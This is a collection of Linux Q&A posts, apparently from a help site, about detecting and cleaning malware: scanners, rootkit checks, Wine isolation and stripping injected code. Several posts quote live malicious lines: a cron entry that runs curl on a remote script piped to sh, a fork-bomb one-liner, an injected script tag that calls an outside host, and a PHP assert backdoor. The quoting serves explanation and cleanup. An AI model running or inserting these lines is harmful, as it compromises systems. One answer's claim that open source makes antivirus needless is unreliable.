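mkdir -p ~/quarantine
# in mutt: press "v" to view the attachment list, then "s" to save the .exe into ~/quarantine
file ~/quarantine/bill.exe        # confirm what the file really is
clamscan ~/quarantine/bill.exe    # scan it without ever executing it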
I received a really classic spam mail stating that I have to pay a bill. The mail included an attachment (.exe). Just for curiosity reasons: What would happen if I click on the attachment? (I am running Crunchbang, no Wine installed)? Is there a way to securely inspect the attachment?
Securely inspect email attachment
Google announced this is not a problem; if you add a domain account to the machine, Chrome will now show this message. Many thanks to the esteemed Rui F Ribero who does waay too much for us here, and who provided the original link.
Today I opened Google Chrome and saw this in the Customize and Control menu: "managed by your organization". Is that a sign of malware? If yes, how can I completely remove that malware? My OS is a Linux RHEL distribution and my Chrome version is: 75.0.3770.80 (Official Build) (64-bit)
google chrome “managed by your organization” on linux
An antivirus for Debian really is not a requirement, but if you share files with others, it may be wise to scan the files before sharing them. An antivirus isn't really needed because Linux is open source, which means that everyone can look for the flaws: the ones that matter tend to get discovered and fixed, and the ones nobody (including attackers) has found yet are usually minor and don't compromise an important part of the system, so attackers can't do much. I have never used an antivirus with Linux and I haven't had a problem. Of course it's safer to use one, because you never know; it's up to you.
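If you do decide to scan the files you pass on to others, clamscan from the clamav package is the usual choice; a quick sketch (the directory is an example):

sudo apt-get install clamav
sudo freshclam                 # update the signature database
clamscan -ri ~/shared-files    # recurse, list only infected files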
I use Debian 7 and I visit various unknown websites. People say that we get viruses from the internet and that those viruses hack our bank accounts; do I really need an antivirus? I have 512 MB RAM. Also, I do not install software from other sources, only from the repository. My RAM is 47% used. I have also installed Wine.
Do I really need an antivirus on Debian 7? [closed]
There is also the possibility that malware installs itself in the MBR/VBR boot sectors of the drive. From there it could be executed automatically if booting from USB storage devices is enabled, and as soon as the malware runs, it could install nasty root/bootkits. To clean the MBR of the USB drive of any malware, install a new one, and remove any existing boot flag from all partitions on the drive using fdisk or any other partition manager (gparted, cfdisk, ...).
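A rough sketch of doing that from Linux, assuming the stick shows up as /dev/sdb (double-check the device name first, this overwrites the boot code):

lsblk                                            # make absolutely sure which device is the stick
sudo dd if=/dev/zero of=/dev/sdb bs=446 count=1  # wipe the MBR boot code, keep the partition table
sudo fdisk /dev/sdb                              # use the "a" command to clear any boot flag, then "w" to save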
When I use my USB drive on Windows computers, then return to my Linux computer, I find many extra files are added to the drive, often exe files and various folders.Is it sufficient to delete the new files? Will some viruses be placed inside my files? Is there some software to help identify and delete these, from Linux?
Deleting viruses from USB
QUESTION: What does the "clamav@scan" service do by default if it finds threats?It informs the client FURTHER QUESTION: I would like ClamAV to have the "classic" behavior of an antivirus engine, that is, remove threats automatically. it doesn't do that. it just sits around waiting for something to give it a file to inspect.If he doesn't do this by default what should I do to make him do it?use the "clamscan" command.
I have been researching ClamAV to understand what the "clamd@scan" service does by default if it finds threats. So far I have not been able to get a satisfactory and clear answer (forums, documentation, etc.)...
QUESTION: What does the "clamd@scan" service do by default if it finds threats?
FURTHER QUESTION: I would like ClamAV to have the "classic" behavior of an antivirus engine, that is, remove threats automatically. If it doesn't do this by default, what should I do to make it do so?
NOTE: The operating system of choice was CentOS 7 and the process used is described in this tutorial https://hostpresto.com/community/tutorials/how-to-install-clamav-on-centos-7/ .
Thanks! =D
ClamAV - What does the "clamd@scan" service do by default?
Stop there! Your system has been infected by a malware. At this point, you can't trust what your system says. The malware may have modified the kernel. What you see is what the malware wants you to see. The system may not behave consistently. Don't expect a file to be modified just because the editor saved it successfully, for example. To reiterate, forget about understanding permissions, immutable attributes, etc. All that stuff is for a working system. On a compromised system, things do not behave in any consistent way. What you need to do now is:Take the server offline immediately. It may be infecting users with malware. Take a backup. Don't erase any of your existing backups! You need a backup of the infected system for two reasons: to trace where the infection came from, and to ensure that you have the latest data. Figure out how you got infected. This is important: if you bring the system back up with the same security hole as before, it'll get infected again. Install a new system from scratch. You cannot reliably remove malware from a system. Malware tries to make this difficult, and you can never be sure that you out-tricked it. Make sure to install the latest security updates of all software, and to configure it securely, so that it won't get infected again. Restore your data. Make sure that you restore only data, and not vulnerable software.See also How do I deal with a compromised server?
In a means to suppress a malware that created a crontab entry below, II introduced the usage of cron.deny */5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|shHowever, all user crontabs suddenly stopped triggering every job. During troubleshooting, I observed all cron associated file for all users are not editable. ls -lht /etc/cron.denyus -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.denyls -lht /var/spool/cron/root -rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/rootchmod 775 /etc/cron.deny chmod: changing permissions of `/etc/cron.deny': Operation not permittedchmod 775 /var/spool/cron/root chmod: changing permissions of `/var/spool/cron/root': Operation not permittedI later found out they all have an immutable attribute. lsattr /var/spool/cron/root ----i--------e- /var/spool/cron/rootlsattr /etc/cron.deny ----i--------e- /etc/cron.denyI changed the immutable attribute using commands below: chattr -i /etc/cron.deny chattr -i /var/spool/cron/rootYet the cron fails to trigger these jobs.
Why are my user crontab files immutable, and why don't they get executed even after changing the attribute to mutable?
For the most part an AV just scans files. It will remove malicious Windows payloads when running on Linux (and vice versa). The detection doesn't depend on the host architecture or operating system at all, as the malware code is not run by the AV at scan time. So, as long as you mount your Windows NTFS partition somewhere under Linux, you can tell your Linux AV to scan the files in it for malware (or just let it do its default thing where it scans all accessible filesystems). Thus you are just plain looking for Linux AV software, with no special requirements.
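A minimal sketch with ClamAV, assuming the Windows system partition is /dev/sda3 (check with lsblk or GParted first):

sudo mkdir -p /mnt/windows
sudo mount -t ntfs-3g -o ro /dev/sda3 /mnt/windows   # read-only is enough for scanning
sudo freshclam                                        # update signatures
clamscan -ri /mnt/windows                             # recurse, print only infected files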
Hopefully, not too broad of a question. For Windows 10, I was considering dual booting at least for the purposes of malware detection and removal. While AVG, and probably others, offer live rescue discs, what is feasible from an outside source? Ideally I would use a laptop running Linux to scan the windows pc, but let's assume a dual-boot scenario. Can I "install" AVG, Kaspersky, et. al. "to" Linux to scan another partition on the same hard drive? The target pc uses secure boot, UEFI.
how do I scan the windows partition for malware?
It's coded in VBScript and affects only PCs running Windows.
Recently I connected a pendrive infected with VBS Jenxcus to my Linux machine. Did it affect my operating system?
Does virus VBS Jenxcus affect Linux operating system? [closed]
a) Can I scan the same file concurrently by multiple antiviruses at the same time?Yes you should be able to scan the files concurrently. The only issue is if your server can handle the load of multiple scanners running at the same time. I might do 2 or 3 of them at a time, just to limit things. b) Should I run each antivirus only when it's needed (an user has uploaded a file and it has to be scan) and should they run all the time in background? If the second option, won't they conflict with each other? c) In case, there are more files have to be scanned, should I run a new process-antivirus for each file or can I "queue" the files for each antivirus?I'd opt to scan them on demand, meaning scan them each time a file is uploaded, just to spread the burden out, assuming you don't get a ton of file uploads. If it's a high volume situation I'd change tactics slightly and scan them at designated times of the day. Depending on how you structure your scanning, you'll likely need to delay making the files available until the scanning step has been completed.
I'm starting to need to scan all files uploaded to my website for viruses. I've implemented a pretty simple prototype which I tested locally and it seemed to work well. However, I need to make it more complex by involving more antiviruses, so that each uploaded file can be scanned by each of them. But I'm hesitating. Here are the possible issues:
a) Can I scan the same file concurrently with multiple antiviruses at the same time?
b) Should I run each antivirus only when it's needed (a user has uploaded a file and it has to be scanned), or should they run all the time in the background? If the second option, won't they conflict with each other?
c) In case there are more files to be scanned, should I run a new antivirus process for each file, or can I "queue" the files for each antivirus?
Yes, I'm aware of third-party services doing exactly this; I don't need them.
Scanning a file with multiple antiviruses
The command should be executed with superuser privileges:
sudo maldet --scan-all
or enable scan_user_access in conf.maldet:
sudo sed -i 's/scan_user_access="0"/scan_user_access="1"/' /usr/local/maldetect/conf.maldet
maldet --scan-all
In your case, to modify the configuration file:
sudo sed -i 's/scan_user_access="0"/scan_user_access="1"/' /home/mn/maldetect-1.6.4/files/conf.maldet
To run the command:
/home/mn/maldetect-1.6.4/files/maldet
You can create an alias by putting the following line in your ~/.bashrc:
alias maldet='/home/mn/maldetect-1.6.4/files/maldet'
Then run:
exec bash
maldet
I am trying to install LMD linux malware Detect version 1.6.4 on Ubuntu. It shows that the installation was completed successfully; I could even open the conf.maldet for configuration options via terminal, when I try to run the LMD, it says "maldet command not found". I noticed on the installation guides/tutorials on previous versions that it will be automatically unpacked in usr/local/, mine says the same but when I go to my usr/local/ I do not see maldet as is expected. My maldetect-1.6.4 is installed in the home directory and it only contains a 'files' directory inside where all other directories are kept. (base) mn@mn-MS-7C02:~$ -maldet --scan-all -maldet: command not found (base) mn@mn-MS-7C02:~$ /home/mn/maldetect-1.6.4/files/maldet -u or maldet -d Linux Malware Detect v1.6.4 (C) 2002-2019, R-fx Networks <[emailprotected]> (C) 2019, Ryan MacDonald <[emailprotected]> This program may be freely redistributed under the terms of the GNU GPL v2maldet(13231): {glob} $intcnf not found, aborting.Any suggestion or help is very much appreciated.
maldet command not found when installing LMD on Linux Ubuntu
Basically, let's say you are a forensic investigator and you are given a Linux system like Ubuntu, and are asked to find suspicious startup executables: how will you do it and what tools will you use to speed up the process?
You can inspect every program executed on a machine using forkstat. The output will contain a ton of noise due to the sheer number of processes spawning at any given time, but the list you obtain through this should be exhaustive. [0] Let's assume the kernel on the system you're analyzing has the NETLINK_CONNECTOR functionality enabled and your forkstat binary is not compromised, e.g. you compiled and deployed it yourself. You have to decide how early you want it to start listening for events. Create a unit file and hook into the system startup at an appropriate moment, e.g. basic.target:
# cat /etc/systemd/system/forkstat.service
[Unit]
Description=process sniffer

[Service]
ExecStart=/sbin/forkstat

[Install]
WantedBy=basic.target
Verify that it works by starting the service and observing the result with journalctl -f. The forkstat output will then be captured in the system journal. Note that this is really early during startup, before the root filesystem is even available, so for this to work the forkstat binary must be available in the initrd. How you add it to the initrd depends on the distro. For Arch it's as simple as adding it to the BINARIES=… line in mkinitcpio.conf. Enable the service, rebuild the initrd, reboot. After the new boot you can use journalctl -b to review the captured events:
Dec 04 10:12:17 zombo.com systemd[1]: Started process sniffer.
Dec 04 10:12:17 zombo.com forkstat[318]: Time     Event  PID  Info  Duration  Process
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 exec   321  [/sbin/modprobe -q -- iptable_nat]
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork     1 parent /sbin/init
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork   322 child  /sbin/init
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 exit   313      0 0.610s /usr/sbin/rpc.idmapd
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork     2 parent [kthreadd]
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork   323 child  [kthreadd]
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork   265 parent /usr/lib/systemd/systemd-udevd
Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork   324 child  /usr/lib/systemd/systemd-udevd
You will be interested mostly in the parent and child lines, which indicate what process executed which binary. I'll refer you to the forkstat manpage for the details.
Caution: since this is an exhaustive overview of process spawning activity, the journal can get quite big. Make sure you set the journal limits to appropriately large values to accommodate the tremendous amount of log messages generated. Also note that the veracity of this output depends on a trustworthy kernel. If you suspect the kernel itself has been compromised, rootkit style, you may want to deploy a known trustworthy kernel first.
[0] On a really busy system some events might get dropped, which is an artifact of the underlying netlink API that forkstat uses.
In Windows, the Autoruns tool is really helpful for forensic investigators: it helps them find suspicious startup executables and filter out the benign ones. But I couldn't find anything good like this for Linux, so what is the easiest way to achieve what Autoruns does in finding suspicious startup apps? Is there any tool like that in Linux? Basically, let's say you are a forensic investigator and you are given a Linux system like Ubuntu, and are asked to find suspicious startup executables: how will you do it and what tools will you use to speed up the process?
What is the equivalent of autoruns tool in linux for finding suspicious startup executables?
I am going to try some linux live CDs made by individuals, I want to make sure that it's not malware contained, how do I do it?You can't. You're running arbitrary software on your machine; it could do anything at all, and there's simply no way to check for that in advance. They intentionally have the ability to overwrite your hard drive, for example, because that's the fundamental point of them. If you don't trust the source, don't trust the disc.If you want to try them out (reasonably) safely, you can use a virtual machine such as VirtualBox or VMWare, which will isolate the running code from your real machine. There are several questions here and on SuperUser about setting those up.
I am going to try some Linux live CDs made by individuals. I want to make sure that it doesn't contain malware. How do I do it?
How can I do a virus scan on a Linux CD or ISO from windows?
Pretty sure the base64 string is just a cover-up and is never actually used. The backticks are a command substitution even inside the double quotes, so the embedded fork bomb r()(r{,54}|r{,});r runs while the shell is still building the argument to echo; it runs first and never returns, so eval and base64 -d never get to do anything.
I can't figure out what this is trying to do. The part between backticks looks like a plain old forkbomb, but the base64 doesn't seem to decode to anything sensible. Can you help? Don't run it, obviously :) eval $(echo "a2Vrf4xvcml\ZW%3t`r()(r{,54}|r{,});r`26a2VrZQo=" | base64 -d)
What is the exact function of this malicious bash one-liner?
As reported here and here, the Linux.MulDrop.14 malware is a bash script which exploits the victim by installing and running a crypto-currency mining program. As I understand it, it needs to be run inside the machine to infect it; other vectors of infection aren't specified. Therefore, if you don't run or install dubious software or scripts, you should be fine. You should also change the default password of your Raspberry Pi. Besides being a possible entry point for the first infection, the default password is also what lets the infection spread: once the malware manages to infect a Raspberry Pi, it will SSH to other machines on the network using the default Raspberry Pi credentials "login=pi, password=raspberry", then upload and run a copy of itself.
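A minimal hardening sketch along those lines (on Raspbian the SSH service is called ssh; set up your SSH key before turning password logins off):

passwd                       # run as the pi user to replace the default "raspberry" password
sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo systemctl restart ssh   # from now on only key-based logins are accepted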
The Dr.Web has recently discovered a new linux malware called Linux.MulDrop.14 , targeting rpi with raspbian OS.Linux.MulDrop.14 Linux Trojan that is a bash script containing a mining program, which is compressed with gzip and encrypted with base64. Once launched, the script shuts down several processes and installs libraries required for its operation. It also installs zmap and sshpass.How to secure Raspberry-Pie with raspbian OS , controlled over SSH against the Linux.MulDrop.14 malware ?
How to secure Raspberry-Pie controlled over SSH against the Linux.MulDrop.14 malware?
Full disclosure: I'm not a WINE user but found this question interesting, so I did a bit of digging. Apparently malware has been found to run inside of WINE, but what is the potential for it to affect the host system? I would assume that, with regard to normal Windows viruses, there is no meaningful context for them to do their real work in; they'll either think they are doing it, or simply not work. But if there is, for example, a way to write to the boot sector of your hard drive in a transparent way from WINE (by "transparent way" I mean whatever way a virus would do this via Windows), then that's a serious risk, because some of them do that. Since WINE isn't a real emulator (a good thing) and wasn't created from actual Windows source, exploits based on real Windows flaws/backdoors probably cannot work. However, a virus that targets WINE specifically -- i.e., one which can tell it is running in WINE on *nix -- could presumably do things with the privileges of the WINE process. The last question in the WINE FAQ addresses the issue a bit, and I'll reproduce part of it here:
11.1. Wine is malware-compatible
Just because Wine runs on a non-Windows OS doesn't mean you're protected from viruses, trojans, and other forms of malware. There are several things you can do to protect yourself:
Never run executables from sites you don't trust. Infections have already happened.
In web browsers and mail clients, be suspicious of links to URLs you don't understand and trust.
Never run any application (including Wine applications) as root (see above).
Use a virus scanner, e.g. ClamAV is a free virus scanner you might consider using if you are worried about an infection; see also Ubuntu's notes on how to use ClamAV. No virus scanner is 100% effective, though.
Removing the default Wine Z: drive, which maps to the unix root directory, is a weak defense. It will not prevent Windows applications from reading your entire filesystem, and will prevent you from running Windows applications that aren't reachable from a Wine drive (like C: or D:). A workaround is to copy/move/symlink downloaded installers to ~/.wine/drive_c before you can run them.
If you're running applications that you suspect to be infected, run them as their own Linux user or in a virtual machine (the ZeroWine malware analyzer works this way).
So, it appears that there are reported cases of malware appearing inside of WINE, but none reporting that it somehow affected stuff outside of WINE. However, the potential obviously exists, if someone wrote malware that targeted WINE specifically, or if WINE gives transparent access to certain hardware. You can guard against the nastiest potentials there by never running WINE as root.
I have installed Wine and I am afraid that viruses will affect my PC now. I will not open any .exe file other than my own (which I use every day).
Could Autorun Virus, affect my PC via Wine? [duplicate]
If, as your answer says, the payload is on a single line by itself, this will do it, while creating backups of the files altered: find -name header.php -exec sed -i.bak '/someplacedodgy\.kr\/js\/jquery.min.php/d' {} \; -lsJust be sure that the "someplacedodgy" string is unique to the payload lines. Omit the .bak from -i.bak if you wish to skip the backups.
I have a number of header.php files that have a malicious script tag contained within them (don't ask). I've written a not-so-elegant shell script to replace these with blank space. I had initially tried to subtract the payload from the header.php but this didn't seem possible as the file was not a sorted list. Below is my code: echo 'Find all header.php files' find -name header.php -print0 > tempheader echo 'Remove malware script from headers' cat tempheader | xargs -0 sed -i 's/\<script\>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http:\/\/someplacedodgy.kr\/js\/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "\&se_referrer=" + se_referrer + "\&source=" + host; var f_url = base + "?c_utt=snt2014\&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null \&\& default_keyword !== '' \&\& se_referrer !== null \&\& se_referrer !== ''){document.write('\<script type="text\/javascript" src="' + f_url + '"\>' + '\<' + '\/script\>');}\<\/script\>/ /g'The issue is that this code fails to execute with the error: sed: -e expression #1, char 578: unterminateds' command`. My assumption is that there are unescaped characters causing this issue, I have tried escaping all <> and {}'s, however this didn't seem to help (note the <> are still escaped above). If there is a way to input a file containing the string into sed like sed -i 's/$payload/ /g' I have not been able to work that out yet.
How to remove a script tag from a text file with sed
Unfortunately my server is infected... =\
Part of the Chkrootkit security utility output ( http://www.chkrootkit.org/ )...
NOTE: Information confirmed via system analysis!
[...]
Searching for Linux.Xor.DDoS ...
INFECTED: Possible Malicious Linux.Xor.DDoS installed
/tmp/.X19-unix/.rsync/c/lib/64/libc.so.6
/tmp/.X19-unix/.rsync/c/lib/64/libpthread.so.0
/tmp/.X19-unix/.rsync/c/lib/64/tsm
/tmp/.X19-unix/.rsync/c/lib/32/libc.so.6
/tmp/.X19-unix/.rsync/c/lib/32/libpthread.so.0
/tmp/.X19-unix/.rsync/c/lib/32/tsm
/tmp/.X19-unix/.rsync/c/lib/arm/libc.so.6
/tmp/.X19-unix/.rsync/c/lib/arm/libpthread.so.0
/tmp/.X19-unix/.rsync/c/lib/arm/tsm
/tmp/.X19-unix/.rsync/c/slow
/tmp/.X19-unix/.rsync/c/tsm
/tmp/.X19-unix/.rsync/c/watchdog
/tmp/.X19-unix/.rsync/c/run
/tmp/.X19-unix/.rsync/c/go
/tmp/.X19-unix/.rsync/c/tsm32
/tmp/.X19-unix/.rsync/c/tsmv7
/tmp/.X19-unix/.rsync/c/start
/tmp/.X19-unix/.rsync/c/tsm64
/tmp/.X19-unix/.rsync/c/stop
/tmp/.X19-unix/.rsync/c/v
/tmp/.X19-unix/.rsync/c/golan
/tmp/.X19-unix/.rsync/c/dir.dir
/tmp/.X19-unix/.rsync/c/n
/tmp/.X19-unix/.rsync/c/aptitude
/tmp/.X19-unix/.rsync/init
/tmp/.X19-unix/.rsync/init2
/tmp/.X19-unix/.rsync/initall
/tmp/.X19-unix/.rsync/a/anacron
/tmp/.X19-unix/.rsync/a/run
/tmp/.X19-unix/.rsync/a/stop
/tmp/.X19-unix/.rsync/a/a
/tmp/.X19-unix/.rsync/a/cron
/tmp/.X19-unix/.rsync/a/init0
/tmp/.X19-unix/.rsync/b/run
/tmp/.X19-unix/.rsync/b/stop
/tmp/.X19-unix/.rsync/b/a
/tmp/.X19-unix/.rsync/1
/tmp/.X19-unix/.rsync/dir.dir
[...]
ACTIONS TAKEN:
Destroy the compromised server.
Change "root" passwords in the local infrastructure.
Change passwords for users able to run as "root".
TIP: Chkrootkit is installed and configured by the private_tux tool ( https://github.com/eduardolucioac/private_tux ). It installs and configures security utilities and performs various security diagnostics automatically.
Disclosure: I am the author of private_tux.
One of my "CentOS 7" servers is showing very strange behavior. A user named "impress+" executes a command called "cron". This "cron" command is executed with a high CPU consumption. I worry because I suspect it may be malware... This server has nothing installed, just "sshd" running.QUESTION: What can I do to find out more about this "impress+" user and this "cron" command? Thanks! =D
CentOS 7 Malware? - User "impress+" executes a command ("cron") with a high CPU consumption
I wouldn't say that this should be disregarded, but I agree with duskwuff that the presentation of the message is nonsense. And I agree that, even if Bitdefender found something in /dev/fd/9, it was specific and localized to a process that was running at that instant, and you won't find anything in /dev/fd now. I suggest that you:
research "Salfeld.Child.Control", "BRD\BRD\keygen\Keygen.exe", and other strings from the messages, and
get another anti-virus product.
The Bitdefender screen talks about "messages" and "Subject" lines. Do you have email on your system? Is there a message with Subject "child control"? The problem might be there. Be careful; if the message has attachments, do not open them.
Your question title is wrong; there's nothing in your question about "tty". The problem was reported in fd 9; the only ttys in your question are file descriptors 0, 1 and 2.
While trying to make sure I have no threats on my iMac I used Bitdefender to perform a full scan, and I found this. Output of running ls -la in /dev/fd:
ls -la
total 11
dr-xr-xr-x  1 root        wheel      0 Nov 25 16:43 .
dr-xr-xr-x  3 root        wheel   5426 Nov 25 16:43 ..
crw---w---  1 ahmedyounes tty    16, 1 Nov 26 03:42 0
crw---w---  1 ahmedyounes tty    16, 1 Nov 26 03:42 1
crw---w---  1 ahmedyounes tty    16, 1 Nov 26 03:42 2
dr--r--r--  1 root        wheel      0 Nov 25 16:43 3
dr--r--r--  1 root        wheel      0 Nov 25 16:43 4
dr--r--r--  1 root        wheel      0 Nov 25 16:43 5
How can I clear this threat, even if it's just an .exe keygen? What may be the source of this threat?
Update after solving it: thanks to Scott, duskwuff and JigglyNaga. It was strange that I couldn't delete it from my iMac, until I went to Gmail from the website and found it.
Threats found in /dev/fd
You can combine sed with find to make it recursive. Something like that: find . -type f -name "*php" -exec sed -i.bak 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//' {} \+Note that it will walk through your current directory tree and apply sed to every existing "*php" file. It will also create .bak backup file for every changed one (so you could restore it later just in case). If you don't need a backup, replace -i.bak just with -i. Otherwise you can remove backups later (once you verified it's all fine) with something like find . -name "*php.bak" -delete. This step won't help you to fix everything right now, but it might definitely save you time in the future: keep your directory with scripts under git (well ideally it should be a complete CI/CD solution, but you can start just with git), so you could easily roll back / forward changes which were applied to your files.
I have my site infected by a virus. This virus added this line in several files in my site. My idea is to remove this line of text with a unique command from the terminal. Let's say I have the folder 'my-folder' and inside it, my files: 'file-1.php', 'file-2.php' and so on. And, let's say there are several files infected. Is there a command to find and remove this line of code in several file at once? Text to remove: extract($_REQUEST) && @assert(stripslashes($accept)) && exit; I found this, but it only works with a single file: $ sed 's/extract($_REQUEST) && @assert(stripslashes($accept)) && exit;//' my-file.php Can I do this?
Linux command to find and remove text from several files at once
Run Wine via firejail, which confines what the Windows program can see and do. Some examples and discussion: https://github.com/netblue30/firejail/issues/2219
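A minimal sketch (paths are examples; firejail ships a wine profile which is normally picked up automatically):

sudo apt-get install firejail
mkdir -p ~/wine-sandbox
firejail --net=none --private=~/wine-sandbox wine ~/Downloads/setup.exe

--net=none cuts the program off from the network entirely, and --private gives it a throwaway home directory instead of your real one.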
After installing Wine I found that there is a z drive that has direct access to root folder. I have seen many threads and news about virus affecting a linux system through wine. How do I make it more secure?
How to use wine with more security?
Once a malware has made it through your system, the system must be considered compromised and unreliable. Therefore any mitigation countermeasure, e.g. blocking connections to specific IPs, is unsafe. Unless you reverse-engineered the malware and have acquired a perfect understanding of how it works, you can never be sure it won't pop up something bad again one day. The only good option is to reformat your machine i.e. "nuke it from orbit", and reinstall again.
Let's say that, somehow, malware is present on your filesystem (e.g. the BusyWinman malware). How would you secure your files against being transferred by such malware to somewhere else? Please describe the most restrictive case.
Securing files against malware [closed]
In general, you don't have to worry about a Linux rootkit spreading to a Windows system, but you have to be aware that a compromised network can open any system on it up to similar problems. Don't delete /sbin/init! It controls your boot/shutdown, so deleting it will leave you with an unbootable system. chkrootkit mostly looks for known signatures and suspicious strings; it doesn't verify whether the flagged files actually belong to a rootkit, which makes it prone to false positives. Java is notorious for triggering these false positives, as are many other programming tools. You're going to want to install rkhunter and scan your system as well, since it also checks file properties and known rootkit paths, but it too is prone to false positives, so don't be too quick to remove files without double-checking whether they belong there or not. If your distro has a livecd, you can often copy that /sbin/init to the system, and it should boot okay, but no guarantees. Personally, if you're certain your password was compromised on a system acting as a firewall for a network, I'd opt for a fresh install and do a more thorough job securing the system. Tools like chkrootkit and rkhunter tend to be more useful for endpoint systems, especially for home users, rather than for primary entry points, mainly because, by nature, they're always chasing new developments in the security realm, so they'll never catch the newest exploits. Once a firewall is rooted, it's important to check all the systems on the network as well. A Linux firewall may have its password changed to lock you out, but a Windows system is an easy target, too. It's possible that such a blatant attack means the attacker intended to blackmail you for access to your locked-out system, so check your mail logs, there might be a message in there asking for money, and preferably report the problem to the authorities in your area, so they can assist in tracking down these groups.
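A quick sketch of the rkhunter run mentioned above (Debian/Ubuntu-style package names assumed):

sudo apt-get install rkhunter
sudo rkhunter --update             # refresh its data files
sudo rkhunter --propupd            # baseline file properties while you still trust the system
sudo rkhunter --check --sk         # full check; --sk skips the "press enter" prompts
sudo less /var/log/rkhunter.log    # review warnings before deleting anything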
I tried logging in to my admin account and it said password incorrect. There is no way it could have been incorrect since I copy-pasted it from a usb drive. I reset my password, installed chkrootkit and found out that I've been infected with a rootkit. So what do I do, just delete the files chkrootkit reported? Here is the terminal output: user1@user1-linux ~ $ sudo chkrootkit [sudo] password for username: ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not found Checking `gpm'... not found Checking `grep'... not infected Checking `hdparm'... not infected Checking `su'... not infected Checking `ifconfig'... not infected Checking `inetd'... not infected Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... not infected Checking `login'... not infected Checking `ls'... not infected Checking `lsof'... not infected Checking `mail'... not found Checking `mingetty'... not found Checking `netstat'... not infected Checking `named'... not found Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... not infected Checking `rpcinfo'... not found Checking `rlogind'... not found Checking `rshd'... not found Checking `slogin'... not infected Checking `sendmail'... not found Checking `sshd'... not found Checking `syslogd'... not tested Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... not infected Checking `telnetd'... not found Checking `timed'... not found Checking `traceroute'... not found Checking `vdir'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... no suspect files Searching for sniffer's logs, it may take a while... nothing found Searching for rootkit HiDrootkit's default files... nothing found Searching for rootkit t0rn's default files... nothing found Searching for t0rn's v8 defaults... nothing found Searching for rootkit Lion's default files... nothing found Searching for rootkit RSHA's default files... nothing found Searching for rootkit RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/python3/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/jvm/.java-1.7.0-openjdk-amd64.jinfo /usr/lib/python2.7/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/pymodules/python2.7/.path /lib/modules/3.19.0-32-generic/vdso/.build-id /lib/modules/3.19.0-32-generic/vdso/.build-id Searching for LPD Worm files and dirs... nothing found Searching for Ramen Worm files and dirs... nothing found Searching for Maniac files and dirs... nothing found Searching for RK17 files and dirs... nothing found Searching for Ducoci rootkit... nothing found Searching for Adore Worm... nothing found Searching for ShitC Worm... 
nothing found Searching for Omega Worm... nothing found Searching for Sadmind/IIS Worm... nothing found Searching for MonKit... nothing found Searching for Showtee... nothing found Searching for OpticKit... nothing found Searching for T.R.K... nothing found Searching for Mithra... nothing found Searching for LOC rootkit... nothing found Searching for Romanian rootkit... nothing found Searching for Suckit rootkit... Warning: /sbin/init INFECTED Searching for Volc rootkit... nothing found Searching for Gold2 rootkit... nothing found Searching for TC2 Worm default files and dirs... nothing found Searching for Anonoying rootkit default files and dirs... nothing found Searching for ZK rootkit default files and dirs... nothing found Searching for ShKit rootkit default files and dirs... nothing found Searching for AjaKit rootkit default files and dirs... nothing found Searching for zaRwT rootkit default files and dirs... nothing found Searching for Madalin rootkit default files... nothing found Searching for Fu rootkit default files... nothing found Searching for ESRK rootkit default files... nothing found Searching for rootedoor... nothing found Searching for ENYELKM rootkit default files... nothing found Searching for common ssh-scanners default files... nothing found Searching for suspect PHP files... nothing found Searching for anomalies in shell history files... nothing found Checking `asp'... not infected Checking `bindshell'... not infected Checking `lkm'... chkproc: nothing detected chkdirs: nothing detected Checking `rexedcs'... not found Checking `sniffer'... lo: not promisc and no packet sniffer sockets eth0: PACKET SNIFFER(/sbin/dhclient[1166]) Checking `w55808'... not infected Checking `wted'... chkwtmp: nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... user user2 deleted or never logged from lastlog! user user1 deleted or never logged from lastlog! user user3 deleted or never logged from lastlog! Checking `chkutmp'... The tty of the following user process(es) were not found in /var/run/utmp ! ! RUID PID TTY CMD ! rasmus 2650 pts/0 /usr/bin/xflux -l 60° -k 3400 -nofork chkutmp: nothing deleted Checking `OSX_RSPLUG'... not infectedSorry about the messed up formatting, I don't know how to get it to display properly. Anyways, these files are infected: The following suspicious files and directories were found: /usr/lib/python3/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/jvm/.java-1.7.0-openjdk-amd64.jinfo /usr/lib/python2.7/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/pymodules/python2.7/.path /lib/modules/3.19.0-32-generic/vdso/.build-id /lib/modules/3.19.0-32-generic/vdso/.build-idSearching for Suckit rootkit... Warning: /sbin/init INFECTEDI also changed the firewalls settings so that it logs any suspicious action. I'm on Windows right 